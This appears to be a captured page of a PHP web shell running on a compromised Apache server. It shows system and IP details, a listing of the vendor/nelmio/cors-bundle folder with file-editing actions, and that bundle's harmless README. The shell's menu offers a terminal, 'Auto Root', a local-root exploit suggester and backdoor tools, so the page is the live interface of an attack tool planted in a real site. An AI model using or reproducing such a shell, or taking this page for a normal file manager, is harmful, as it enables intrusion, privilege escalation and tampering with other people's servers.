Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
nelmio /
cors-bundle /
Delete
Unzip
Name
Size
Permission
Date
Action
DependencyInjection
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
EventListener
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Options
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Resources
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
CHANGELOG.md
4.07
KB
-rwxrwxr-x
2026-01-12 15:59
LICENSE
1.02
KB
-rwxrwxr-x
2026-01-12 15:59
NelmioCorsBundle.php
671
B
-rwxrwxr-x
2026-01-12 15:59
README.md
1.11
KB
-rwxrwxr-x
2026-01-12 15:59
SECURITY.md
95
B
-rwxrwxr-x
2026-01-12 15:59
composer.json
1.18
KB
-rwxrwxr-x
2026-01-12 15:59
Save
Rename
# NelmioCorsBundle ## About The NelmioCorsBundle allows you to send [Cross-Origin Resource Sharing](http://enable-cors.org/) headers with ACL-style per-URL configuration. ## Features * Handles CORS preflight OPTIONS requests * Adds CORS headers to your responses * Configured at the PHP/application level. This is convenient but it also means that any request serving static files and not going through Symfony will not have the CORS headers added, so if you need to serve CORS for static files you probably should rather configure these headers in your web server ## Installation Require the `nelmio/cors-bundle` package in your composer.json and update your dependencies: ```bash composer require nelmio/cors-bundle ``` The bundle should be automatically enabled by [Symfony Flex][1]. If you don't use Flex, you'll need to enable it manually as explained [in the docs][2]. ## Usage See [the documentation][2] for usage instructions. ## License Released under the MIT License, see LICENSE. [1]: https://symfony.com/doc/current/setup/flex.html [2]: https://symfony.com/bundles/NelmioCorsBundle/current/index.html